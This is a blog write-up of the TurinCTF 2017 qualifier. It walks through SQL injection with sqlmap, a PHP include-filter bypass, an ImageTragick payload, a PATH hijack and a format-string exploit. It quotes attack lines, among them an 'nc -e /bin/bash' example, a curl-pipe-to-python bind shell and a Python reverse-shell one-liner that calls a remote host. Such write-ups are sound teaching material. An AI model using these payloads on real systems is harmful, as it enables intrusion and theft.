---
layout: post
title:  "TurinCTF 2017 - Quals"
date:   2017-11-22 00:05
categories: [TurinCTF2017]
tags: [Web, Pwn]
author: jbz
---

The [Turin Cybersec Hackaton](https://cybersec.jetop.com/) was organized by the guys at JeTOP, in collaboration with KPMG, Shielder and the PoliTO University.

***TL;DR***
This is a big Wall-of-Text.  
If you were stuck in a specific point **Ctrl+F** -> `flagN` where *N* is the flag you want. ;)

## First Part: Log-in

We start by visiting the website `quals.turinctf.it`.

By inspecting the page source code we can read a comment saying:

	TODO:
	1. remove that upload file as soon as possible
	2. find out why time() does not display current timestamp in seconds

Let's try visiting `upload.php` then.

Wow, **flag1** popped in an error message! `T_CTF{wh393_d_f4k_4m_1?}`

There wasn't many things other than that so we need to break through the login screen located at:
	
	quals.turinctf.it/login.php

This was the usual (and ugly) login screen, featuring a fancy but suspect reset password form.

By fiddling around with the forms we understood the username and password forms where not injectable.  
The reset password form instead behaved in a interesting way:  
if you gave it a random username it complained about not knowing it,  
but if you input something like:
	
	randomuser' or '1'='1

It answered that it had successfully sent a reset password email. 
It meant it was vulnerable to **SQL Injection**. 

With BURP we intercepted and stored the **HTTP POST** request sent to the `reset_password.php` script as `request.txt`, then we ran the following command:

	sqlmap -r request.txt -p username --dbms=sqlite --drop-set-cookie --regexp=".*sent.*"

The last switch in the command was necessary because the SQLi was **blind** as the server didn't return any error so the only way to understand if the injection worked was the *"password reset link sent"* text that appeared if the expression was evaluated correctly. 

*Note*: Sqlmap will ask if you want to follow redirection. Press `Y`. After that will ask if you want to reinject into the redireted page. Press `N`.

The command ran as expected, so we re-ran it appending a `-a` switch at the end in order to dump the database. This is what came out:
	
	+----+-------+-----------------------------------------------+
	| id | name  | password                                      | 
	+----+-------+-----------------------------------------------+
	| 1  | admin | 6eea9b7ef19179a06954edd0f6c05ceb (qwertyuiop) |	
	+----+-------+-----------------------------------------------+
	| 2  | flag  | T_CTF{414_U_U53_5QLM49?}	                     |
	+----+-------+-----------------------------------------------+

There was another flag! **flag4**!

Also our friend sqlmap was so kind to crack the admin hash for us.  
The only problem was that if you tried to login with the admin credentials the portal wouldn't let you in because you had to set the `?admin=nope` parameter in the URL to something different from nope. 

By visiting the following url:

	quals.turinctf.it/login.php?admin=yep

and using the credentials `admin`:`qwertyuiop` you could access the portal and retrieve **flag2**: `T_CTF{th3_c4k3_15_4_L13}`.

Alternatively, there is a cookie called `whoami` set to `084e0343a0486ff05530df6c705c8bb4`.  
A quick search on google tell us that it's the **md5** of *guest*.

You can set the `whoami` cookie to `md5('admin')` to login ;)

## Second Part: Getting a reverse shell

Once we logged in as admin, the admin page welcomed us with 3 links:
 - `import_travel_photos.php`, where you can import a file from *URL*
 - `view_travel_photos.php`, where you can view a file from it's *path*
 - `make_collage.php`, where you can *load* `.php` template *file* :D 

So we started by trying the import one.

If we pass an URL the website print the message:

	Your photo has been saved correctly to /tmp/travel_photo_" . time() . ", congrats!" 

This is what the **TODO** was referring to!

We write-down the timestamp before the import request, import an URL and try to view it in the view page.  
It works, sometimes, if you have the same time as the server.

*Note*: `sudo ntpdate -s time.nist.gov` syncs your local time to the *NIST* one. ;) 

Finally, we tested the behavior of make_collage, that was **including php** file.  
We tried including `../admin.php` but we got `HACKING ATTEMPT` in reply.  

No time to play around. We **dumped the source code** using the view page.

**flag3** was in a php variable inside the `index.php` file: `T_CTF{c00k135_r_d311c10u5}`.

We found out that when including the template file, `make_collage.php` was filtering the filename:

	include("./templates/" . filter($_REQUEST['template']));

The filter function:

	function filter($path){
	  if (strpos($path,"/") != false) { die("HACKING ATTEMPT"); }
	  $path = str_replace("../","",$path);
	  $path = str_replace(urldecode("%00"),"",$path);
	  return $path;
	}

So, in this condition `strpos($path,"/") != false`  php isn't checking the type returned by `strpos`  
`strpos` return `false` if the second argument isn't found in the first one. Otherwise returns the position of the *first occurrence*.

If we place a `/` at the start, the position is `0` and `0 == false` so we bypass that if.

`str_replace(old, new, str)` replace `old` with `new` in `str`.  
Every nullbyte or `../` is removed, but...
If `str` is something like `....//path`, removing `../` will result in `../path`. Bingo!

Using `/....//....//....//..../+path` we can load arbitrary files from the `/` folder.

*Note*: you can also use nullbyte as a replacer `/..%00/..%00/..%00/..%00+path`

Import a reverse shell from URL and load it with `/tmp/travel_photo_*`

**You know me, I don't like doing things manually so I wrote a [python script](https://github.com/jbzteam/CTF/blob/master/TurinCTF2017/bruter.py) to automate this.**


## Third Part: From UID1000 to UID0

	$ whoami
	www-data

We are in.  
We took a look around and find out 2 folders in `/opt`:
 - imageconverter
 - copyrightreminder

Looking at the crontab:

	*/5 * * * * level1 /opt/imageconverter/identify.sh 

The `identify.sh` script runs every 5 minutes as `level1`.

	#!/bin/bash

	for file in $(ls /var/www/html/uploads/)
	do
		identify /var/www/html/uploads/$file &
	done

It's rather simple. For every file in the uploads folder, run identify (from ImageMagik tools) on that file.

At the first time we tried pwning the `$file` variable to execute multiple command by creating a file named `;program` but this wasn't working because `ls` was splitting spaces in file and also you can't insert `/` in filenames (like `;nc -e /bin/bash -lvp 8080`).

We returned to the identify command and noticed that imagemagik wasn't updated since 2014. All the clues were pointing at [ImageTragik](https://imagetragick.com/).

Long story short this vulnerability allowed code execution through specially crafted images.  
Knowing how the vulnerability worked we modified the following PoC:

	push graphic-context
	viewbox 0 0 640 480
	fill 'url(https://scusette.it/nonscrivowriteups.jpg"|cat "/etc/passwd)'
	pop graphic-context

We then substituted the `cat "/etc/passwd` with a common python reverse shell, put it into a `exploit.mvg` file and moved it to uploads. Kids, remember `+x` permission ;)  
We then waited... and waited... and waited... (cronjobs exploits are always a pain in the a\*\*)

w00t w00t, the reverse shell suddenly came up and "whoami" answered us with "level1". Gg.

After escalating to *level1* we added to the `.ssh/authorized_keys` a newly generated throw-away public key and logged in via ssh.  
In `/home/level1/secrets/flag` we got **flag5**: `T_CTF{y4_kn0w_kn0wn_sP100i7z_gG_br0}` 

Now we were in, with a decent ssh connection and a decent terminal.  
We went through the usual routine of checking all the stuff that need to be checked in order to escalate privileges and a thing that immediately came to our eyes was the output of the following command:

	sudo -l

which suggested we could run a file named `add_copyright` with the permission of user `level2`.  
As usual we ran `strings` against that binary to see if we could find something interesting in it and the following strings came out:

	Now we will add the copyright to the photo!
	./copyrighter photo.jpg 2>/dev/null
	Copyright failed!

Mmmmh. No absolute path? That's great! We quickly made a directory inside `/tmp` named `bin` and copied `/bin/sh` in there, renaming it `copyrighter`. After that we created a script named `photo.jpg` with the following content:

	#!/bin/sh

	/bin/sh

Then we ran the following command `sudo -u level2 /opt/copyrightreminder/add_copyright` which executed the "copyrighter" (former sh) in our folder which in turn executed `photo.jpg` that gave me a shell as *level2*. Cool as a cucumber ;)

*Note*: sudoers was setting it's secure path but didn't excluded `.` neither `~/bin` and `~/.local/bin`.
If you had permissions and a `./copyrighter` file in your `cwd` this works flawless.

**flag6**: `T_CTF{70_Ph0LL0W_73h_pa7h,_l00K_70_73h_mA573R,_Ph0ll0w_73H_MA573r,_wALK_W17h_73H_mA573R,_533_7Hr0u9H_73h_mA573r,_83C0M3_73h_ma573R,0r_jus7_3X3cU73_PHR0m_4N07H3R_P47H.}`


Now that we are *level2* we can ls into `/home/level3/`

	-r-------- 1 level3 level3   60 Nov 14 13:52 config
	-r-sr-x--- 1 level3 level2 7728 Nov 14 15:04 copyrighter

We can see that `copyrighter` that has `setuid` permission enabled and will be executed as *level3*

	$ stat -c "%a %U" /home/level3/copyrighter 
	4550 level3

We downloaded the binary file (via scp or sftp) and [decompiled](https://github.com/jbzteam/CTF/blob/master/TurinCTF2017/copyrighter_decompiled.c) with IDA

You can "easily" see that the `printf(&s)` call in `add_copyright` function is a vulnerable format string.

*Note*: I actually never exploited a format string before so I needed a fast-course on that :D

Briefly, `printf` expect the format string as first parameter, like `int: %d, string: %s`.  
For each format code, printf will check for the next allocation in the stack and will print that value instead.

This way we can read values from the memory.  
Using `%n` you can write in the next allocation the number of bytes read in the format string until now.

Target: overwrite the `exit(1)` call at the end of `add_copyright` function with the address of `read_config` function so the latter will be executed and it will print the `config` file. 

This 3 video from LiveOverflow will help you understand.
[1](https://www.youtube.com/watch?v=0WvrSfcdq1I) [2](https://www.youtube.com/watch?v=kUk5pw4w0h4) [3](https://www.youtube.com/watch?v=t1LH9D5cuK4)

With `objdump -d ./copyrighter` we get the `exit@plt` GOT and `read_config` addresses

	08048480 <exit@plt>:
	 8048480:	ff 25 24 a0 04 08    	jmp    *0x804a024   <------------- exit
	 8048486:	68 30 00 00 00       	push   $0x30
	 804848b:	e9 80 ff ff ff       	jmp    8048410 <_init+0x28>
	[...] 
	080485cb <read_config>:    <------------ read_config
	 80485cb:	55                   	push   %ebp
	 80485cc:	89 e5                	mov    %esp,%ebp


We need to overwrite `0x804a024` with `0x80485cb`.

We wrote [this python script](https://github.com/jbzteam/CTF/blob/master/TurinCTF2017/pwn.py) that will create the exploit.

How many chars we need to write with `%n` ?

	0x80485cb

	0x85cb - 32 = 34219  # lower nibble

	0x10804 - 0x85cb = 33337  # higher nibble

*Note*: the leading one in the last difference is required since we read `0x85cb` chars from the start and `0x804` is less then that (we can't un-read chars :D). Anyway it will overflow so no problems.

We also wrote [this python script](https://github.com/jbzteam/CTF/blob/master/TurinCTF2017/fmt.py) that will automatically exploit the executable.

Finally	`python pwn.py | ./copyrighter` revealed **flag7**: `T_CTF{u_PhUk'D_mY_574ck,_D0_J00_Ph33L_h4Ppy?_K0Z_U_5h0ulD!}`


## Scoreboard

[Final Scoreboard](https://github.com/jbzteam/CTF/blob/master/TurinCTF2017/flags.jpg)

## Honorable mentions

	$ cat .bash_history 
	echo 'miachiave' > .ssh/authorized_keys      
 
replacing, not appending. This dropped other players keys

	$ ps aux
	www-data 32027  0.0  0.0   4508   700 ?        S    17:58   0:00 sh -c curl https://raw.githubusercontent.com/****/tmp/master/bind1111.png | python

bind shell on port 1111 publicly accessible

	$ who
	level2   pts/0        2017-11-21 12:48 (ip1)
	level2   pts/2        2017-11-21 11:55 (ip2)
	level2   pts/3        2017-11-21 11:19 (ip3)
	level2   pts/4        2017-11-21 12:15 (ip1)
	level2   pts/6        2017-11-21 13:29 (ip1)
	level2   pts/8        2017-11-21 12:31 (ip1)

when 1 session isn't enougth

	$ cat shell
	python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("url",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"])'

spawning a shell without `&` making php hangs and all the website unreachable

## Hope you enjoyed this CTF 